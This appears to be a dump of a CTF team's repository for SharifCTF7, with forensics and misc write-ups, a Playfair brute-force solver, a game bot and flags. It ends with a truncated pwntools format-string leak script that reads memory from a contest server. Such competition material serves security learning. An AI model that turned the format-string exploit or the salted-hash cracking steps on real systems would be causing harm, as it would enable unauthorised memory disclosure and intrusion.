 613 | 140 645 m 140 625 l
 614 | 120 645 m 120 625 l  
 615 | 120 615 m 120 595 l 
 616 | 120 590 m 140 590 l 
 617 | 140 615 m 140 595 l 
 618 | 
 619 | 160 650 m 180 650 l 
 620 | 180 645 m 180 625 l
 621 | 160 645 m 160 625 l  
 622 | 160 615 m 160 595 l 
 623 | 160 590 m 180 590 l 
 624 | 180 615 m 180 595 l 
 625 | S
 626 | endstream
 627 | endobj
 628 | 
 629 | 16 0 obj
 630 | <</Length 254>>
 631 | stream
 632 | 2 w 
 633 | 
 634 | 140 645 m 140 625 l
 635 | 120 645 m 120 625 l  
 636 | 120 620 m 140 620 l 
 637 | 140 615 m 140 595 l 
 638 | 
 639 | 160 650 m 180 650 l 
 640 | 180 645 m 180 625 l
 641 | 160 645 m 160 625 l  
 642 | 160 620 m 180 620 l 
 643 | 160 590 m 180 590 l 
 644 | 180 615 m 180 595 l
 645 | 160 615 m 160 595 l 
 646 | S
 647 | endstream
 648 | endobj
 649 | 
 650 | 17 0 obj
 651 | <</Length 194>>
 652 | stream
 653 | 2 w  
 654 | 
 655 | 120 650 m 140 650 l 
 656 | 120 645 m 120 625 l 
 657 | 120 620 m 140 620 l  
 658 | 120 590 m 140 590 l 
 659 | 140 615 m 140 595 l 
 660 | 
 661 | 160 650 m 180 650 l 
 662 | 180 645 m 180 625 l 
 663 | 180 615 m 180 595 l 
 664 | S
 665 | endstream
 666 | endobj
 667 | 
 668 | 18 0 obj
 669 | <</Length 215>>
 670 | stream
 671 | 2 w  
 672 | 
 673 | 120 650 m 140 650 l 
 674 | 120 645 m 120 625 l 
 675 | 120 620 m 140 620 l  
 676 | 120 590 m 140 590 l 
 677 | 140 615 m 140 595 l 
 678 | 
 679 | 160 620 m 180 620 l 
 680 | 180 645 m 180 625 l
 681 | 160 645 m 160 625 l  
 682 | 180 615 m 180 595 l 
 683 | S
 684 | endstream
 685 | endobj
 686 | 
 687 | 
 688 | 19 0 obj
 689 | <</Length 194>>
 690 | stream
 691 | 2 w  
 692 | 
 693 | 120 650 m 140 650 l 
 694 | 120 645 m 120 625 l 
 695 | 120 620 m 140 620 l  
 696 | 120 590 m 140 590 l 
 697 | 140 615 m 140 595 l 
 698 | 
 699 | 160 650 m 180 650 l 
 700 | 180 645 m 180 625 l 
 701 | 180 615 m 180 595 l 
 702 | S
 703 | endstream
 704 | endobj
 705 | 
 706 | 
 707 | 20 0 obj
 708 | <</Length 237>>
 709 | stream
 710 | 2 w  
 711 | 
 712 | 120 650 m 140 650 l 
 713 | 120 645 m 120 625 l 
 714 | 120 620 m 140 620 l  
 715 | 120 590 m 140 590 l 
 716 | 140 615 m 140 595 l 
 717 | 
 718 | 160 650 m 180 650 l 
 719 | 160 645 m 160 625 l 
 720 | 160 620 m 180 620 l  
 721 | 160 590 m 180 590 l 
 722 | 180 615 m 180 595 l 
 723 | S
 724 | endstream
 725 | endobj
 726 | 
 727 | 21 0 obj
 728 | <</Length 236>>
 729 | stream
 730 | 2 w  
 731 | 
 732 | 120 650 m 140 650 l 
 733 | 120 645 m 120 625 l 
 734 | 120 620 m 140 620 l  
 735 | 120 590 m 140 590 l 
 736 | 140 615 m 140 595 l
 737 | 
 738 | 160 650 m 180 650 l 
 739 | 180 645 m 180 625 l 
 740 | 160 620 m 180 620 l 
 741 | 160 615 m 160 595 l 
 742 | 160 590 m 180 590 l 
 743 | S
 744 | endstream
 745 | endobj
 746 | 
 747 | 22 0 obj
 748 | <</Length 61>>
 749 | stream
 750 | 2 w 
 751 | 
 752 | 140 645 m 140 625 l
 753 | 120 645 m 120 625 l  
 754 | 120 620 m 140 620 l 
 755 | 140 615 m 140 595 l 
 756 | 
 757 | 160 650 m 180 650 l 
 758 | 180 645 m 180 625 l
 759 | 160 645 m 160 625 l  
 760 | 160 620 m 180 620 l 
 761 | 160 590 m 180 590 l 
 762 | 180 615 m 180 595 l 
 763 | S
 764 | endstream
 765 | endobj
 766 | 
 767 | 23 0 obj
 768 | <</Length 61>>
 769 | stream
 770 | 2 w 
 771 | 100 650 m 100 620 l 
 772 | 100 615 m 100 585 l 
 773 | 
 774 | 120 650 m 140 650 l 
 775 | 140 645 m 140 625 l
 776 | 120 645 m 120 625 l  
 777 | 120 615 m 120 595 l 
 778 | 120 590 m 140 590 l 
 779 | 140 615 m 140 595 l 
 780 | 
 781 | 160 650 m 180 650 l 
 782 | 180 645 m 180 625 l
 783 | 160 645 m 160 625 l  
 784 | 160 615 m 160 595 l 
 785 | 160 590 m 180 590 l 
 786 | 180 615 m 180 595 l 
 787 | S
 788 | endstream
 789 | endobj
 790 | 
 791 | 24 0 obj
 792 | <</Length 61>>
 793 | stream
 794 | 2 w 
 795 | 100 650 m 100 620 l 
 796 | 100 615 m 100 585 l 
 797 | 
 798 | 120 650 m 140 650 l 
 799 | 140 645 m 140 625 l
 800 | 120 645 m 120 625 l  
 801 | 120 615 m 120 595 l 
 802 | 120 590 m 140 590 l 
 803 | 140 615 m 140 595 l 
 804 | 
 805 | 160 650 m 180 650 l 
 806 | 180 645 m 180 625 l
 807 | 160 645 m 160 625 l  
 808 | 160 615 m 160 595 l 
 809 | 160 590 m 180 590 l 
 810 | 180 615 m 180 595 l 
 811 | S
 812 | endstream
 813 | endobj
 814 | 
 815 | 25 0 obj
 816 | <</Length 61>>
 817 | stream
 818 | 2 w 
 819 | 100 650 m 100 620 l 
 820 | 100 615 m 100 585 l 
 821 | 
 822 | 120 650 m 140 650 l 
 823 | 140 645 m 140 625 l
 824 | 120 645 m 120 625 l  
 825 | 120 615 m 120 595 l 
 826 | 120 590 m 140 590 l 
 827 | 140 615 m 140 595 l 
 828 | 
 829 | 160 650 m 160 620 l 
 830 | 160 615 m 160 585 l 
 831 | S
 832 | endstream
 833 | endobj
 834 | 
 835 | 26 0 obj
 836 | <</Length 61>>
 837 | stream
 838 | 2 w  
 839 | 
 840 | 120 650 m 140 650 l 
 841 | 120 645 m 120 625 l 
 842 | 120 620 m 140 620 l  
 843 | 120 590 m 140 590 l 
 844 | 140 615 m 140 595 l 
 845 | 
 846 | 160 650 m 180 650 l 
 847 | 160 645 m 160 625 l 
 848 | 160 620 m 180 620 l  
 849 | 160 590 m 180 590 l 
 850 | 180 615 m 180 595 l 
 851 | S
 852 | endstream
 853 | endobj
 854 | 
 855 | 27 0 obj
 856 | <</Length 61>>
 857 | stream
 858 | 2 w 
 859 | 100 650 m 100 620 l 
 860 | 100 615 m 100 585 l 
 861 | 
 862 | 120 650 m 140 650 l 
 863 | 140 645 m 140 625 l
 864 | 120 645 m 120 625 l  
 865 | 120 615 m 120 595 l 
 866 | 120 590 m 140 590 l 
 867 | 140 615 m 140 595 l 
 868 | 
 869 | 160 650 m 160 620 l 
 870 | 160 615 m 160 585 l 
 871 | S
 872 | endstream
 873 | endobj
 874 | 
 875 | 28 0 obj
 876 | <</Length 61>>
 877 | stream
 878 | 2 w 
 879 | 100 650 m 100 620 l 
 880 | 100 615 m 100 585 l 
 881 | 
 882 | 120 650 m 140 650 l 
 883 | 140 645 m 140 625 l
 884 | 120 645 m 120 625 l  
 885 | 120 615 m 120 595 l 
 886 | 120 590 m 140 590 l 
 887 | 140 615 m 140 595 l 
 888 | 
 889 | 160 650 m 180 650 l 
 890 | 180 645 m 180 625 l
 891 | 160 645 m 160 625 l  
 892 | 160 615 m 160 595 l 
 893 | 160 590 m 180 590 l 
 894 | 180 615 m 180 595 l 
 895 | S
 896 | endstream
 897 | endobj
 898 | 
 899 | 29 0 obj
 900 | <</Length 61>>
 901 | stream
 902 | 2 w  
 903 | 
 904 | 120 650 m 140 650 l 
 905 | 120 645 m 120 625 l 
 906 | 120 620 m 140 620 l  
 907 | 120 590 m 140 590 l 
 908 | 140 615 m 140 595 l 
 909 | 
 910 | 160 650 m 180 650 l 
 911 | 160 645 m 160 625 l 
 912 | 160 620 m 180 620 l  
 913 | 160 590 m 180 590 l 
 914 | 180 615 m 180 595 l 
 915 | S
 916 | endstream
 917 | endobj
 918 | 
 919 | 
 920 | 30 0 obj
 921 | <</Length 61>>
 922 | stream
 923 | 2 w  
 924 | 
 925 | 120 650 m 140 650 l 
 926 | 120 645 m 120 625 l 
 927 | 120 620 m 140 620 l  
 928 | 120 590 m 140 590 l 
 929 | 140 615 m 140 595 l 
 930 | 
 931 | 160 650 m 180 650 l 
 932 | 180 645 m 180 625 l 
 933 | 180 615 m 180 595 l 
 934 | S
 935 | endstream
 936 | endobj
 937 | 
 938 | 31 0 obj
 939 | <</Length 61>>
 940 | stream
 941 | 2 w 
 942 | 
 943 | 120 650 m 140 650 l 
 944 | 140 645 m 140 625 l
 945 | 120 645 m 120 625 l  
 946 | 120 620 m 140 620 l 
 947 | 120 590 m 140 590 l 
 948 | 140 615 m 140 595 l
 949 | 
 950 | 160 650 m 180 650 l 
 951 | 180 645 m 180 625 l
 952 | 160 645 m 160 625 l  
 953 | 160 620 m 180 620 l 
 954 | 160 590 m 180 590 l 
 955 | 180 615 m 180 595 l 
 956 | S
 957 | endstream
 958 | endobj
 959 | 
 960 | 32 0 obj
 961 | <</Length 61>>
 962 | stream
 963 | 2 w  
 964 | 
 965 | 120 650 m 140 650 l 
 966 | 120 645 m 120 625 l 
 967 | 120 620 m 140 620 l  
 968 | 120 590 m 140 590 l 
 969 | 140 615 m 140 595 l 
 970 | 
 971 | 160 650 m 160 620 l 
 972 | 160 615 m 160 585 l
 973 | 
 974 | S
 975 | endstream
 976 | endobj
 977 | 
 978 | 33 0 obj
 979 | <</Length 61>>
 980 | stream
 981 | 2 w 
 982 | 
 983 | 120 650 m 140 650 l 
 984 | 140 645 m 140 625 l
 985 | 120 645 m 120 625 l  
 986 | 120 620 m 140 620 l 
 987 | 120 590 m 140 590 l 
 988 | 140 615 m 140 595 l
 989 | 
 990 | 160 650 m 180 650 l 
 991 | 180 645 m 180 625 l
 992 | 160 645 m 160 625 l  
 993 | 160 620 m 180 620 l 
 994 | 160 590 m 180 590 l 
 995 | 180 615 m 180 595 l 
 996 | S
 997 | endstream
 998 | endobj
 999 | 
1000 | 34 0 obj
1001 | <</Length 61>>
1002 | stream
1003 | 2 w  
1004 | 
1005 | 120 650 m 140 650 l 
1006 | 120 645 m 120 625 l 
1007 | 120 620 m 140 620 l  
1008 | 120 590 m 140 590 l 
1009 | 140 615 m 140 595 l
1010 | 
1011 | 160 650 m 180 650 l 
1012 | 180 645 m 180 625 l 
1013 | 160 620 m 180 620 l 
1014 | 160 615 m 160 595 l 
1015 | 160 590 m 180 590 l 
1016 | 
1017 | S
1018 | endstream
1019 | endobj
1020 | 
1021 | 35 0 obj
1022 | <</Length 61>>
1023 | stream
1024 | 2 w 
1025 | 
1026 | 140 645 m 140 625 l
1027 | 120 645 m 120 625 l  
1028 | 120 620 m 140 620 l 
1029 | 140 615 m 140 595 l 
1030 | 
1031 | 160 650 m 180 650 l 
1032 | 180 645 m 180 625 l
1033 | 160 645 m 160 625 l  
1034 | 160 620 m 180 620 l 
1035 | 160 590 m 180 590 l 
1036 | 180 615 m 180 595 l
1037 | 160 615 m 160 595 l 
1038 |  
1039 | S
1040 | endstream
1041 | endobj
1042 | 
1043 | 36 0 obj
1044 | <</Length 61>>
1045 | stream
1046 | 2 w  
1047 | 
1048 | 120 650 m 140 650 l 
1049 | 120 645 m 120 625 l 
1050 | 120 620 m 140 620 l  
1051 | 120 590 m 140 590 l 
1052 | 140 615 m 140 595 l 
1053 | 
1054 | 160 650 m 180 650 l 
1055 | 180 645 m 180 625 l 
1056 | 180 615 m 180 595 l 
1057 | S
1058 | endstream
1059 | endobj
1060 | 
1061 | 37 0 obj
1062 | <</Length 61>>
1063 | stream
1064 | 2 w 
1065 | 
1066 | 120 650 m 140 650 l 
1067 | 140 645 m 140 625 l
1068 | 120 645 m 120 625 l  
1069 | 120 620 m 140 620 l 
1070 | 120 590 m 140 590 l 
1071 | 140 615 m 140 595 l
1072 | 
1073 | 160 650 m 180 650 l 
1074 | 180 645 m 180 625 l
1075 | 160 645 m 160 625 l  
1076 | 160 620 m 180 620 l 
1077 | 160 590 m 180 590 l 
1078 | 180 615 m 180 595 l 
1079 | S
1080 | endstream
1081 | endobj
1082 | 
1083 | 
1084 | 38 0 obj
1085 | <</Length 61>>
1086 | stream
1087 | 2 w  
1088 | 
1089 | 120 650 m 140 650 l 
1090 | 120 645 m 120 625 l 
1091 | 120 620 m 140 620 l  
1092 | 120 590 m 140 590 l 
1093 | 140 615 m 140 595 l
1094 | 
1095 | 160 650 m 180 650 l 
1096 | 180 645 m 180 625 l 
1097 | 160 620 m 180 620 l 
1098 | 160 615 m 160 595 l 
1099 | 160 590 m 180 590 l 
1100 | 
1101 | S
1102 | endstream
1103 | endobj
1104 | 
1105 | 
1106 | 39 0 obj
1107 | <</Length 61>>
1108 | stream
1109 | 2 w  
1110 | 
1111 | 120 650 m 140 650 l 
1112 | 120 645 m 120 625 l 
1113 | 120 620 m 140 620 l  
1114 | 120 590 m 140 590 l 
1115 | 140 615 m 140 595 l 
1116 | 
1117 | 160 620 m 180 620 l 
1118 | 180 645 m 180 625 l
1119 | 160 645 m 160 625 l  
1120 | 180 615 m 180 595 l 
1121 | S
1122 | endstream
1123 | endobj
1124 | 
1125 | 40 0 obj
1126 | <</Length 61>>
1127 | stream
1128 | 2 w 
1129 | 100 650 m 100 620 l 
1130 | 100 615 m 100 585 l 
1131 | 
1132 | 120 650 m 140 650 l 
1133 | 140 645 m 140 625 l 
1134 | 120 620 m 140 620 l 
1135 | 120 615 m 120 595 l 
1136 | 120 590 m 140 590 l 
1137 | 
1138 | 160 650 m 180 650 l 
1139 | 160 645 m 160 625 l 
1140 | 160 620 m 180 620 l  
1141 | 160 590 m 180 590 l 
1142 | 180 615 m 180 595 l 
1143 | S
1144 | endstream
1145 | endobj
1146 | 
1147 | 
1148 | 
1149 | xref
1150 | 0 40
1151 | 0000000000 65535 f
1152 | 0000000010 00000 n
1153 | 0000000079 00000 n
1154 | 0000000173 00000 n
1155 | 0000000301 00000 n
1156 | 0000000380 00000 n
1157 | 0000000450 00000 n
1158 | trailer
1159 | <<
1160 |   /Size 8
1161 |   /Root 1 0 R
1162 | >>
1163 | startxref
1164 | 600
1165 | %%EOF


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/synced/README.md:
--------------------------------------------------------------------------------
1 | ##Synced
2 | 
3 | There are about 3 floppy images in the `pcap`; We extracted some pictures from that and fixed them but found no flag.
4 | There is a suspicious pattern at the end of the file; Seems like a colorful Linux terminal output.
5 | We cut that part and `cat` in terminal and got the flag
6 | 
7 | ![capture.png](capture.png)


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/synced/capture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/synced/capture.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/synced/cat this:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/synced/cat this


--------------------------------------------------------------------------------
/2016-SharifCTF7/Forensics/synced/recovered pictures.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Forensics/synced/recovered pictures.rar


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/Playfake/playfake.py:
--------------------------------------------------------------------------------
  1 | from random import randint, choice
  2 | from string import ascii_uppercase
  3 | from hashlib import md5
  4 | 
  5 | LIN = 'B'
  6 | LOUT = 'P'
  7 |  
  8 | def make_key(key_str):
  9 | 	key_str += ascii_uppercase
 10 | 	key_str = key_str.replace(' ', '').upper().replace(LIN, LOUT)
 11 | 
 12 | 	seen = set()
 13 | 	seen_add = seen.add
 14 | 	return [x for x in key_str if not (x in seen or seen_add(x))]
 15 |  
 16 |  
 17 | def get_pos(key, letter):
 18 | 	i = key.index(letter)
 19 | 	return (i//5, i%5)
 20 | 
 21 | def get_letter(key, i, j):
 22 | 	i %= 5
 23 | 	j %= 5
 24 | 	return key[5*i + j]
 25 |  
 26 | def make_message(msg):
 27 | 	msg = msg.replace(' ', '').upper().replace(LIN, LOUT)
 28 | 	outp = ''
 29 | 	i = 0
 30 | 	while True:
 31 | 		if i+1 >= len(msg):
 32 | 			if i == len(msg)-1:
 33 | 				outp += msg[i]
 34 | 			break
 35 | 		if msg[i] == msg[i+1]:
 36 | 			outp += msg[i] + 'Y'
 37 | 			i += 1
 38 | 		else:
 39 | 			outp += msg[i] + msg[i+1]
 40 | 			i += 2
 41 | 	if len(outp) % 2 == 1:
 42 | 		outp += 'Y'
 43 | 	return outp
 44 |  
 45 | def playfair_enc(key, msg):
 46 | 	assert len(msg) % 2 == 0
 47 | 	assert len(key) == 25
 48 | 	ctxt = ''
 49 | 	for i in range(0, len(msg), 2):
 50 | 		r0, c0 = get_pos(key, msg[i])
 51 | 		r1, c1 = get_pos(key, msg[i+1])
 52 | 		if r0 == r1:
 53 | 			ctxt += get_letter(key, r0+1, c0+1) + get_letter(key, r1+1, c1+1)
 54 | 		elif c0 == c1:
 55 | 			ctxt += get_letter(key, r0-1, c0-1) + get_letter(key, r1-1, c1-1)
 56 | 		else:
 57 | 			ctxt += get_letter(key, r0+1, c1-1) + get_letter(key, r1+1, c0-1)
 58 | 	return ctxt
 59 | 
 60 | import itertools
 61 | 
 62 | def mydec(key,msg):#brutforce for decrypt:D
 63 | 	rev={}
 64 | 	
 65 | 	for xs in itertools.product(ascii_uppercase, repeat=2):
 66 | 		if 'B' in xs:
 67 | 			continue
 68 | 		y = ''.join(xs)
 69 | 		rev[playfair_enc(key,y)]=y
 70 | 
 71 | 	ans=""
 72 | 	for i in range(0, len(msg), 2):
 73 | 		x=msg[i:i+2]
 74 | 		if x not in rev:return False
 75 | 		ans+=rev[x]
 76 | 	return ans
 77 | 
 78 | def make_flag(msg):
 79 | 	return 'SharifCTF{%s}' % md5(msg.replace(' ', '').upper().encode('ASCII')).hexdigest()
 80 | 
 81 | 
 82 | ########## part 1 ##########
 83 | # for xs in itertools.product(ascii_uppercase, repeat=5):
 84 | # 		if 'B' in xs: continue
 85 | # 		tkey = ''.join(xs)
 86 | # 		key = make_key(tkey)
 87 | # 		dec=mydec(key,"KPDPDGYJXNUSOIGOJDUSUQGFSHJUGIEAXJZUQVDKSCMQKXIR")
 88 | # 		if "SHARIFCTF" in dec and "CONTEST" in dec:
 89 | # 			print ''.join(tkey),key,dec
 90 | ########## part 2 ##########
 91 | key="PROWN"
 92 | msg="CURRENTLY THE SEVENTH SHARIF CTF CONTEST IS BEING HELD"
 93 | if __name__ == '__main__':
 94 | 	key = make_key(key)
 95 | 	msg2 = make_message(msg)
 96 | 	ctxt = playfair_enc(key, msg2)
 97 | 	print(ctxt)
 98 | 	
 99 | 	# Notice that flag is generated using "msg", not "msg2".
100 | 	# After decryption, you get "msg2".
101 | 	# You must manually add spaces and perform other required changes to get "msg".
102 | 	flag = make_flag(msg)
103 | 	print(flag)
104 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/camera_model/1538:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/camera_model/1538


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/camera_model/README.md:
--------------------------------------------------------------------------------
1 | # Camera Model
2 | 
3 | 
4 | There is an image inside the binary. The image was extracted with binwalk and the camera model could be easily found by checking the image's properties (DSLR4781).
5 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/README.md:
--------------------------------------------------------------------------------
 1 | ## Find Login
 2 | 
 3 | We were given a 32-bit executable VMProtected file and an ini file which contains this section:
 4 | 
 5 | ```
 6 | [Login]
 7 | Username=SharifCTF
 8 | Password=16074598B43D002C25E5719B4CC6E3AB0233F56285C92668CBA3DB7FF8D4138DC0D8738D4B830A520EEF2E432624760E5273AFC1E03409A948323A07FCCFB3C2923212C8965B3FFCD028F95EEC4D2F4F3FDE63DFFDD243B2C6D6B1A4142C97604F35
 9 | ```
10 | 
11 | As you can see the username is plain and we just need to find the password. So I tried to debug  and find it:
12 | 
13 | ![capture1.png](capture1.png)
14 | 
15 | Here is username comparison:
16 | 
17 | ![capture2.png](capture2.png)
18 | 
19 | Hash cleanup:
20 | 
21 | ![capture3.png](capture3.png)
22 | 
23 | And get the correct hash:
24 | 
25 | ```
26 | 453d259be3338568dbd4c08d0aef260eaf344807b33296fcf94d3fdf43d61460
27 | ```
28 | 
29 | Continue tracing until this call:
30 | 
31 | ![capture4.png](capture4.png)
32 | 
33 | I was using `123` as the password and you can see it’s concatenated to `SharifCTF7` as salt and inside it you can see it uses `SHA256` to generate our hash. So I have to crack it:
34 | 
35 | ![capture5.png](capture5.png)
36 | 
37 | ```
38 | SHA256(PASSWORD+"SharifCTF7") == "453d259be3338568dbd4c08d0aef260eaf344807b33296fcf94d3fdf43d61460"
39 | ```
40 | 
41 | `Hashcat` plus `rockyou.txt` helps us to find the password and it was `147467`.


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/capture1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/find_login/capture1.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/capture2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/find_login/capture2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/capture3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/find_login/capture3.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/capture4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/find_login/capture4.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/find_login/capture5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/find_login/capture5.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/lesula_isola/README.md:
--------------------------------------------------------------------------------
1 | # Lesula Isola
2 | 
3 | The game is inspired by the [Insult Sword Fighting game](http://monkeyisland.wikia.com/wiki/Insult_Sword_Fighting)
4 | 
5 | The script learns the winning and loosing comebacks over time.
6 | 
7 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/lesula_isola/lesula-isola.py:
--------------------------------------------------------------------------------
  1 | from __future__ import print_function
  2 | import websocket
  3 | ### irGeeks
  4 | ### SharifCTF{2f7a87d9afd14d7f6de27546e8084168}
  5 | questions = []
  6 | 
  7 | class Q():
  8 |     def __init__(self, q):
  9 |         self.q = q
 10 |         self.fails = []
 11 |         self.wins = []
 12 |         
 13 | def find(str):
 14 |     for x in questions:
 15 |         if(x.q == str):
 16 |             return x
 17 |     return None
 18 | 
 19 | 
 20 | def print_menu(msg):
 21 |     s = msg.split("#")
 22 |     for i in range(len(s)):
 23 |         print("{0}: {1}".format(i,s[i]))
 24 | 
 25 | def add(list, str):
 26 |     if(not str in list):
 27 |         list.append(str)
 28 |                 
 29 | def analyse_him(asking, msg, ans, stat):
 30 |     fail = True if stat == "00" else False
 31 |     q = find(msg)
 32 |     if(q == None):
 33 |         q = Q(msg)
 34 |         questions.append(q)    
 35 | 
 36 |     if(asking):
 37 |         if(fail):
 38 |             add(q.wins, ans)
 39 |         else:
 40 |             add(q.fails, ans)
 41 |             
 42 |     else:
 43 |         if(fail):
 44 |             add(q.fails, ans)
 45 |         else:
 46 |             add(q.wins, ans)
 47 |             
 48 | def strOf(idx, options):
 49 |     s = options.split("#")
 50 |     return s[idx]    
 51 |     
 52 | def indexOf(str, strOptions):
 53 |     s = strOptions.split("#")
 54 |     
 55 |     if(not str in strOptions):
 56 |         return None
 57 |     
 58 |     for i in range(len(s)):
 59 |         if(s[i] == str):
 60 |             return i
 61 | 
 62 | def validOptions(qs, fail):
 63 |     s = set(fail)
 64 |     all = qs.split("#")
 65 |     temp = [x for x in all if x not in s] 
 66 |     res = ""
 67 |     for t in temp:
 68 |         res+= " {0}".format(indexOf(t,qs))
 69 |     return res
 70 | 
 71 | def answer(msg, strOptions): # returns  str of index if found otherwise list of valid options 
 72 |         
 73 |     q = find(msg)
 74 |     if (q == None):
 75 |         return ""#, "" #validOptions(strOptions,[])
 76 |     
 77 |     if(len(q.wins) > 0 ):
 78 |         for win in q.wins:
 79 |             if win in strOptions:
 80 |                 return str(indexOf(win,strOptions))#,"" #validOptions(strOptions, [])
 81 |             else:
 82 |                 return ""#, "" #validOptions(strOptions, q.fails)
 83 |                 
 84 | 
 85 | def read(options):
 86 |     return "0"
 87 |     r = len(options.split("#"))
 88 |     while(True):
 89 |         try:
 90 |             x = int(raw_input("Which:"))
 91 |             if(x <r):
 92 |                 return str(x)
 93 |         except:
 94 |             pass
 95 |                 
 96 |         print("Invalid")
 97 | 
 98 | s = websocket.create_connection("ws://213.233.175.130:4010")
 99 | 
100 | ready = False
101 | r = 0
102 | 
103 | while(True):
104 |     
105 |     if (not ready):
106 |         stat = s.recv()
107 |         print(stat)
108 |     ready = False
109 |     
110 |     if ("lost" in stat.lower()):
111 |         r+=1
112 |         print("round {0}".format(r))
113 |         continue
114 |     elif ("flag" in stat.lower()):
115 |         exit()
116 |     
117 |     if(stat == "01"):
118 |         qs = s.recv()
119 |         print(qs)
120 |         qs = qs[1:]
121 |         print_menu(qs)
122 |         ans = read(qs)
123 |         s.send(ans)
124 |         his_ans = s.recv()
125 |         print(his_ans)
126 |         stat = s.recv()
127 |         print(stat)
128 |         analyse_him(True, strOf(int(ans), qs), his_ans[1:], stat)
129 |         ready = True
130 |         
131 |     elif(stat == "00"):
132 |         q = s.recv()
133 |         print(q)
134 |         q = q[1:]
135 |         options = s.recv()
136 |         print(options)
137 |         options = options[1:]
138 |         ans = answer(q, options)
139 |         
140 |         if (ans == "" or ans == None):
141 |             print("\nQ:{0}".format(q))
142 |             print_menu(options)
143 |             #print("Suggestions:{0}".format(suggestions))
144 |             ans = read(options)
145 |             ans = "0"
146 |         s.send(ans)
147 |         stat = s.recv()
148 |         print(stat)
149 |         analyse_him(False, q, strOf(int(ans), options), stat)
150 |         ready = True
151 |             
152 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/lost_voice/README.md:
--------------------------------------------------------------------------------
 1 | # Lost Voice
 2 | 
 3 | The flag for this challenge is devided into two parts.
 4 | 
 5 | Finding the first part was as easy as just listening to the voice messgae (95cd605bea9065f44530).
 6 | 
 7 | The second part however was a bit more challenging. After checking the file in hex viewer, I found out that it was a mp4 video. So I decomposed the video frames and compared the two of the frames. It was obvious that it's the same old stegano challenge they give every year (very creative!). So I merged all the images together to get the second part of the flag (cb13b6659dde).
 8 | 
 9 | ### Extract the frames 
10 | ```
11 |  ffmpeg -i LS.mp4 images/%d.png
12 | ```
13 | 
14 | ### To merge them together
15 | ```
16 | cp images/1.png part2.png
17 | for f in `ls -v images`; do compare part2.png images/$f part2.png; done
18 | ```
19 | 
20 | 


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/lost_voice/part2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/irGeeks/ctf/a942c51a91208b124ceeb8c47d53eebf0d332caf/2016-SharifCTF7/Misc/lost_voice/part2.png


--------------------------------------------------------------------------------
/2016-SharifCTF7/Misc/what_is_hidden/README.md:
--------------------------------------------------------------------------------
 1 | ```
 2 | root@xored:/tmp# file data.txt.tar.xz 
 3 | data.txt.tar.xz: XZ compressed data
 4 | root@xored:/tmp# tar xf data.txt.tar.xz 
 5 | root@xored:/tmp# file data.txt
 6 | data.txt: ASCII text, with very long lines, with no line terminators
 7 | root@xored:/tmp# cat data.txt | xxd -r -p > misc315
 8 | root@xored:/tmp# file misc315 
 9 | misc315: lzip compressed data, version: 1
10 | root@xored:/tmp# lunzip misc315 
11 | root@xored:/tmp# file misc315.out 
12 | misc315.out: POSIX tar archive
13 | root@xored:/tmp# tar xvf misc315.out 
14 | What.exe
15 | root@xored:/tmp# file What.exe 
16 | What.exe: PE32 executable (GUI) Intel 80386, for MS Windows
17 | ```
18 | 
19 | **The file is a Windows Executable file; Protected with VMProtect. After Extracting file resources we found a gif file. We can obtain flag.png by appending gif frames in extracted order.**
20 | 
21 | 
22 | ```
23 | root@xored:/tmp# convert +append *.gif flag.png
24 | ```
25 | flag: bc52fead1ecb908ea9ae98b105809b71


--------------------------------------------------------------------------------
/2016-SharifCTF7/Pwn/NoMoreBlind/pwn_NoMoreBlind_leak_text.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # objdump -Mintel,i386 -b binary -m i386 --adjust-vma=0x08048410 -D binary
 4 | 
 5 | from pwn import *
 6 | 
 7 | r = remote("ctf.sharif.edu", 54518)
 8 | b = open("binary", "wb")
 9 | r.sendline("%2$x")
10 | r.recvuntil("bytes\n")
11 | leak = int(r.recvline().strip(), 16)
12 | print hex(leak)
13 | t = 0
14 | for i in range(500):
15 |     r.sendline(p32(0x08048410+t)+"%4$s")
16 |     #r.sendline("%{}$p".format(i))
17 |     #r.sendline("%{}$p".format(i))
18 |     r.recvuntil("bytes\n")
